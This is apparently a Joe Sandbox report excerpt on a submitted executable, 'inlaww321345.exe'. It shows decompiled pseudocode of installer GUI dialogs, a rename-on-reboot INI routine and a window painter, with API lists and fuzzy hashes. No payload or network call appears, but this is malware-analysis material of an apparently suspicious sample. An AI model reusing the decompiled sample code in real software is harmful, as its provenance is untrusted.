                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t198;
                    				intOrPtr _t201;
                    				long _t207;
                    				signed int _t211;
                    				signed int _t222;
                    				void* _t225;
                    				void* _t226;
                    				int _t232;
                    				long _t237;
                    				long _t238;
                    				signed int _t239;
                    				signed int _t245;
                    				signed int _t247;
                    				signed char _t248;
                    				signed char _t254;
                    				void* _t258;
                    				void* _t260;
                    				signed char* _t278;
                    				signed char _t279;
                    				long _t284;
                    				struct HWND__* _t291;
                    				signed int* _t292;
                    				int _t293;
                    				long _t294;
                    				signed int _t295;
                    				void* _t297;
                    				long _t298;
                    				int _t299;
                    				signed int _t300;
                    				signed int _t303;
                    				signed int _t311;
                    				signed char* _t319;
                    				int _t324;
                    				void* _t326;
                    
                    				_t291 = _a4;
                    				_v12 = GetDlgItem(_t291, 0x3f9);
                    				_v8 = GetDlgItem(_t291, 0x408);
                    				_t326 = SendMessageW;
                    				_v24 =  *0x7a8ac8;
                    				_v28 =  *0x7a8ab0 + 0x94;
                    				if(_a8 != 0x110) {
                    					L23:
                    					if(_a8 != 0x405) {
                    						_t301 = _a16;
                    					} else {
                    						_a12 = 0;
                    						_t301 = 1;
                    						_a8 = 0x40f;
                    						_a16 = 1;
                    					}
                    					if(_a8 == 0x4e || _a8 == 0x413) {
                    						_v16 = _t301;
                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                    							if(( *0x7a8ab9 & 0x00000002) != 0) {
                    								L41:
                    								if(_v16 != 0) {
                    									_t237 = _v16;
                    									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                    										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                    									}
                    									_t238 = _v16;
                    									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                    										_t301 = _v24;
                    										_t239 =  *(_t238 + 0x5c);
                    										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                    										} else {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                    										}
                    									}
                    								}
                    								goto L48;
                    							}
                    							if(_a8 == 0x413) {
                    								L33:
                    								_t301 = 0 | _a8 != 0x00000413;
                    								_t245 = E00404F85(_v8, _a8 != 0x413);
                    								_t295 = _t245;
                    								if(_t295 >= 0) {
                    									_t94 = _v24 + 8; // 0x8
                    									_t301 = _t245 * 0x818 + _t94;
                    									_t247 =  *_t301;
                    									if((_t247 & 0x00000010) == 0) {
                    										if((_t247 & 0x00000040) == 0) {
                    											_t248 = _t247 ^ 0x00000001;
                    										} else {
                    											_t254 = _t247 ^ 0x00000080;
                    											if(_t254 >= 0) {
                    												_t248 = _t254 & 0x000000fe;
                    											} else {
                    												_t248 = _t254 | 0x00000001;
                    											}
                    										}
                    										 *_t301 = _t248;
                    										E0040117D(_t295);
                    										_a12 = _t295 + 1;
                    										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
                    										_a8 = 0x40f;
                    									}
                    								}
                    								goto L41;
                    							}
                    							_t301 = _a16;
                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                    								goto L41;
                    							}
                    							goto L33;
                    						} else {
                    							goto L48;
                    						}
                    					} else {
                    						L48:
                    						if(_a8 != 0x111) {
                    							L56:
                    							if(_a8 == 0x200) {
                    								SendMessageW(_v8, 0x200, 0, 0);
                    							}
                    							if(_a8 == 0x40b) {
                    								_t225 =  *0x7a1f6c;
                    								if(_t225 != 0) {
                    									ImageList_Destroy(_t225);
                    								}
                    								_t226 =  *0x7a1f80;
                    								if(_t226 != 0) {
                    									GlobalFree(_t226);
                    								}
                    								 *0x7a1f6c = 0;
                    								 *0x7a1f80 = 0;
                    								 *0x7a8b00 = 0;
                    							}
                    							if(_a8 != 0x40f) {
                    								L90:
                    								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
                    									_t324 = (0 | _a16 == 0x00000020) << 3;
                    									ShowWindow(_v8, _t324);
                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                    								}
                    								goto L93;
                    							} else {
                    								E004011EF(_t301, 0, 0);
                    								_t198 = _a12;
                    								if(_t198 != 0) {
                    									if(_t198 != 0xffffffff) {
                    										_t198 = _t198 - 1;
                    									}
                    									_push(_t198);
                    									_push(8);
                    									E00405005();
                    								}
                    								if(_a16 == 0) {
                    									L75:
                    									E004011EF(_t301, 0, 0);
                    									_v36 =  *0x7a1f80;
                    									_t201 =  *0x7a8ac8;
                    									_v64 = 0xf030;
                    									_v24 = 0;
                    									if( *0x7a8acc <= 0) {
                    										L86:
                    										if( *0x7a8b5e == 0x400) {
                    											InvalidateRect(_v8, 0, 1);
                    										}
                    										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
                    											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
                    										}
                    										goto L90;
                    									}
                    									_t292 = _t201 + 8;
                    									do {
                    										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                    										if(_t207 != 0) {
                    											_t303 =  *_t292;
                    											_v72 = _t207;
                    											_v76 = 8;
                    											if((_t303 & 0x00000001) != 0) {
                    												_v76 = 9;
                    												_v60 =  &(_t292[4]);
                    												_t292[0] = _t292[0] & 0x000000fe;
                    											}
                    											if((_t303 & 0x00000040) == 0) {
                    												_t211 = (_t303 & 0x00000001) + 1;
                    												if((_t303 & 0x00000010) != 0) {
                    													_t211 = _t211 + 3;
                    												}
                    											} else {
                    												_t211 = 3;
                    											}
                    											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                    											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                    											SendMessageW(_v8, 0x113f, 0,  &_v76);
                    										}
                    										_v24 = _v24 + 1;
                    										_t292 =  &(_t292[0x206]);
                    									} while (_v24 <  *0x7a8acc);
                    									goto L86;
                    								} else {
                    									_t293 = E004012E2( *0x7a1f80);
                    									E00401299(_t293);
                    									_t222 = 0;
                    									_t301 = 0;
                    									if(_t293 <= 0) {
                    										L74:
                    										SendMessageW(_v12, 0x14e, _t301, 0);
                    										_a16 = _t293;
                    										_a8 = 0x420;
                    										goto L75;
                    									} else {
                    										goto L71;
                    									}
                    									do {
                    										L71:
                    										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                    											_t301 = _t301 + 1;
                    										}
                    										_t222 = _t222 + 1;
                    									} while (_t222 < _t293);
                    									goto L74;
                    								}
                    							}
                    						}
                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                    							goto L93;
                    						} else {
                    							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                    							if(_t232 == 0xffffffff) {
                    								goto L93;
                    							}
                    							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                    							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                    								_t294 = 0x20;
                    							}
                    							E00401299(_t294);
                    							SendMessageW(_a4, 0x420, 0, _t294);
                    							_a12 = _a12 | 0xffffffff;
                    							_a16 = 0;
                    							_a8 = 0x40f;
                    							goto L56;
                    						}
                    					}
                    				} else {
                    					_v36 = 0;
                    					_v20 = 2;
                    					 *0x7a8b00 = _t291;
                    					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
                    					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
                    					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
                    					_t297 = _t258;
                    					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
                    					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                    					 *0x7a1f6c = _t260;
                    					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                    					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
                    					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                    						SendMessageW(_v8, 0x111b, 0x10, 0);
                    					}
                    					DeleteObject(_t297);
                    					_t298 = 0;
                    					do {
                    						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                    						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                    							if(_t298 != 0x20) {
                    								_v20 = 0;
                    							}
                    							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
                    						}
                    						_t298 = _t298 + 1;
                    					} while (_t298 < 0x21);
                    					_t299 = _a16;
                    					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                    					_push(0x15);
                    					E004045CA(_a4);
                    					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                    					_push(0x16);
                    					E004045CA(_a4);
                    					_t300 = 0;
                    					_v16 = 0;
                    					if( *0x7a8acc <= 0) {
                    						L19:
                    						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                    						goto L20;
                    					} else {
                    						_t319 = _v24 + 8;
                    						_v32 = _t319;
                    						do {
                    							_t278 =  &(_t319[0x10]);
                    							if( *_t278 != 0) {
                    								_v64 = _t278;
                    								_t279 =  *_t319;
                    								_v88 = _v16;
                    								_t311 = 0x20;
                    								_v84 = 0xffff0002;
                    								_v80 = 0xd;
                    								_v68 = _t311;
                    								_v44 = _t300;
                    								_v72 = _t279 & _t311;
                    								if((_t279 & 0x00000002) == 0) {
                    									if((_t279 & 0x00000004) == 0) {
                    										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									} else {
                    										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                    									}
                    								} else {
                    									_v80 = 0x4d;
                    									_v48 = 1;
                    									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									_v36 = 1;
                    									 *( *0x7a1f80 + _t300 * 4) = _t284;
                    									_v16 =  *( *0x7a1f80 + _t300 * 4);
                    								}
                    							}
                    							_t300 = _t300 + 1;
                    							_t319 =  &(_v32[0x818]);
                    							_v32 = _t319;
                    						} while (_t300 <  *0x7a8acc);
                    						if(_v36 != 0) {
                    							L20:
                    							if(_v20 != 0) {
                    								E004045FF(_v8);
                    								goto L23;
                    							} else {
                    								ShowWindow(_v12, 5);
                    								E004045FF(_v12);
                    								L93:
                    								return E00404631(_a8, _a12, _a16);
                    							}
                    						}
                    						goto L19;
                    					}
                    				}
                    			}

                    APIs
                    • GetDlgItem.USER32 ref: 0040504F
                    • GetDlgItem.USER32 ref: 0040505A
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                    • LoadImageW.USER32 ref: 004050BB
                    • SetWindowLongW.USER32 ref: 004050D4
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                    • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                    • DeleteObject.GDI32(00000000), ref: 00405131
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                      • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                    • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                    • SetWindowLongW.USER32 ref: 00405283
                    • ShowWindow.USER32(?,00000005), ref: 00405293
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                    • ImageList_Destroy.COMCTL32(?), ref: 00405461
                    • GlobalFree.KERNEL32 ref: 00405471
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                    • ShowWindow.USER32(?,00000000), ref: 0040561B
                    • GetDlgItem.USER32 ref: 00405626
                    • ShowWindow.USER32(00000000), ref: 0040562D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 2564846305-813528018
                    • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                    • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                    • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                    • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                    				char _v8;
                    				int _v12;
                    				void* _v16;
                    				struct HWND__* _t56;
                    				signed int _t75;
                    				signed short* _t76;
                    				signed short* _t78;
                    				long _t92;
                    				int _t103;
                    				signed int _t110;
                    				intOrPtr _t113;
                    				WCHAR* _t114;
                    				signed int* _t116;
                    				WCHAR* _t117;
                    				struct HWND__* _t118;
                    
                    				if(_a8 != 0x110) {
                    					if(_a8 != 0x111) {
                    						L13:
                    						if(_a8 != 0x4e) {
                    							if(_a8 == 0x40b) {
                    								 *0x79ff54 =  *0x79ff54 + 1;
                    							}
                    							L27:
                    							_t114 = _a16;
                    							L28:
                    							return E00404631(_a8, _a12, _t114);
                    						}
                    						_t56 = GetDlgItem(_a4, 0x3e8);
                    						_t114 = _a16;
                    						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                    							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                    							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                    							_v12 = _t103;
                    							_v16 = _t113;
                    							_v8 = 0x7a6a40;
                    							if(_t103 - _t113 < 0x800) {
                    								SendMessageW(_t56, 0x44b, 0,  &_v16);
                    								SetCursor(LoadCursorW(0, 0x7f02));
                    								_push(1);
                    								_t44 =  &_v8; // 0x7a6a40
                    								E00404A38(_a4,  *_t44);
                    								SetCursor(LoadCursorW(0, 0x7f00));
                    								_t114 = _a16;
                    							}
                    						}
                    						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                    							goto L28;
                    						} else {
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                    								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
                    							}
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                    								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
                    							}
                    							return 1;
                    						}
                    					}
                    					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
                    						goto L27;
                    					} else {
                    						_t116 =  *0x7a0f60 + 0x14;
                    						if(( *_t116 & 0x00000020) == 0) {
                    							goto L27;
                    						}
                    						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                    						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                    						E00404A14();
                    						goto L13;
                    					}
                    				}
                    				_t117 = _a16;
                    				_t75 =  *(_t117 + 0x30);
                    				if(_t75 < 0) {
                    					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
                    				}
                    				_t76 =  *0x7a8ad8 + _t75 * 2;
                    				_t110 =  *_t76 & 0x0000ffff;
                    				_a8 = _t110;
                    				_t78 =  &(_t76[1]);
                    				_a16 = _t78;
                    				_v16 = _t78;
                    				_v12 = 0;
                    				_v8 = E0040473A;
                    				if(_t110 != 2) {
                    					_v8 = E00404700;
                    				}
                    				_push( *((intOrPtr*)(_t117 + 0x34)));
                    				_push(0x22);
                    				E004045CA(_a4);
                    				_push( *((intOrPtr*)(_t117 + 0x38)));
                    				_push(0x23);
                    				E004045CA(_a4);
                    				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                    				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                    				_t118 = GetDlgItem(_a4, 0x3e8);
                    				E004045FF(_t118);
                    				SendMessageW(_t118, 0x45b, 1, 0);
                    				_t92 =  *( *0x7a8ab0 + 0x68);
                    				if(_t92 < 0) {
                    					_t92 = GetSysColor( ~_t92);
                    				}
                    				SendMessageW(_t118, 0x443, 0, _t92);
                    				SendMessageW(_t118, 0x445, 0, 0x4010000);
                    				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                    				 *0x79ff54 = 0;
                    				SendMessageW(_t118, 0x449, _a8,  &_v16);
                    				 *0x79ff54 = 0;
                    				return 0;
                    			}

                    APIs
                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                    • GetDlgItem.USER32 ref: 0040483B
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                    • GetSysColor.USER32(?), ref: 00404869
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                    • lstrlenW.KERNEL32(?), ref: 0040488A
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                    • GetDlgItem.USER32 ref: 00404905
                    • SendMessageW.USER32(00000000), ref: 0040490C
                    • GetDlgItem.USER32 ref: 00404937
                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404988
                    • SetCursor.USER32(00000000), ref: 0040498B
                    • LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
                    • SetCursor.USER32(00000000), ref: 004049A7
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                    • String ID: @jz$N
                    • API String ID: 3103080414-4087404676
                    • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                    • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                    • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                    • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004062B4(void* __ecx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				long _t12;
                    				long _t24;
                    				char* _t31;
                    				int _t37;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				long _t42;
                    				WCHAR* _t44;
                    				void* _t46;
                    				void* _t48;
                    				void* _t49;
                    				void* _t52;
                    				void* _t53;
                    
                    				_t38 = __ecx;
                    				_t44 =  *(_t52 + 0x14);
                    				 *0x7a5628 = 0x55004e;
                    				 *0x7a562c = 0x4c;
                    				if(_t44 == 0) {
                    					L3:
                    					_t2 = _t52 + 0x1c; // 0x7a5e28
                    					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
                    						_t53 = _t52 + 0x10;
                    						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
                    						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
                    						_t48 = _t12;
                    						 *(_t53 + 0x18) = _t48;
                    						if(_t48 != 0xffffffff) {
                    							_t42 = GetFileSize(_t48, 0);
                    							_t6 = _t37 + 0xa; // 0xa
                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                    							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
                    								L18:
                    								return CloseHandle(_t48);
                    							} else {
                    								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
                    									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
                    									if(_t49 == 0) {
                    										_t48 =  *(_t53 + 0x18);
                    										L16:
                    										_t24 = _t42;
                    										L17:
                    										E00406119(_t24 + _t46, 0x7a5228, _t37);
                    										SetFilePointer(_t48, 0, 0, 0);
                    										E00406210(_t48, _t46, _t42 + _t37);
                    										GlobalFree(_t46);
                    										goto L18;
                    									}
                    									_t39 = _t46 + _t42;
                    									_t31 = _t39 + _t37;
                    									while(_t39 > _t49) {
                    										 *_t31 =  *_t39;
                    										_t31 = _t31 - 1;
                    										_t39 = _t39 - 1;
                    									}
                    									_t24 = _t49 - _t46 + 1;
                    									_t48 =  *(_t53 + 0x18);
                    									goto L17;
                    								}
                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                    								_t42 = _t42 + 0xa;
                    								goto L16;
                    							}
                    						}
                    					}
                    				} else {
                    					CloseHandle(E0040615E(_t44, 0, 1));
                    					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						goto L3;
                    					}
                    				}
                    				return _t12;
                    			}




















                    APIs
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
                    • GetShortPathNameW.KERNEL32 ref: 004062F8
                      • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                      • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                    • GetShortPathNameW.KERNEL32 ref: 00406315
                    • wsprintfA.USER32 ref: 00406333
                    • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                    • GlobalFree.KERNEL32 ref: 0040641C
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423
                      • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00406162
                      • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                    • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                    • API String ID: 2171350718-2000197835
                    • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                    • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                    • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                    • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                    				struct tagLOGBRUSH _v16;
                    				struct tagRECT _v32;
                    				struct tagPAINTSTRUCT _v96;
                    				struct HDC__* _t70;
                    				struct HBRUSH__* _t87;
                    				struct HFONT__* _t94;
                    				long _t102;
                    				signed int _t126;
                    				struct HDC__* _t128;
                    				intOrPtr _t130;
                    
                    				if(_a8 == 0xf) {
                    					_t130 =  *0x7a8ab0;
                    					_t70 = BeginPaint(_a4,  &_v96);
                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                    					_a8 = _t70;
                    					GetClientRect(_a4,  &_v32);
                    					_t126 = _v32.bottom;
                    					_v32.bottom = _v32.bottom & 0x00000000;
                    					while(_v32.top < _t126) {
                    						_a12 = _t126 - _v32.top;
                    						asm("cdq");
                    						asm("cdq");
                    						asm("cdq");
                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                    						_t87 = CreateBrushIndirect( &_v16);
                    						_v32.bottom = _v32.bottom + 4;
                    						_a16 = _t87;
                    						FillRect(_a8,  &_v32, _t87);
                    						DeleteObject(_a16);
                    						_v32.top = _v32.top + 4;
                    					}
                    					if( *(_t130 + 0x58) != 0xffffffff) {
                    						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                    						_a16 = _t94;
                    						if(_t94 != 0) {
                    							_t128 = _a8;
                    							_v32.left = 0x10;
                    							_v32.top = 8;
                    							SetBkMode(_t128, 1);
                    							SetTextColor(_t128,  *(_t130 + 0x58));
                    							_a8 = SelectObject(_t128, _a16);
                    							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
                    							SelectObject(_t128, _a8);
                    							DeleteObject(_a16);
                    						}
                    					}
                    					EndPaint(_a4,  &_v96);
                    					return 0;
                    				}
                    				_t102 = _a16;
                    				if(_a8 == 0x46) {
                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                    					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
                    				}
                    				return DefWindowProcW(_a4, _a8, _a12, _t102);
                    			}














                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
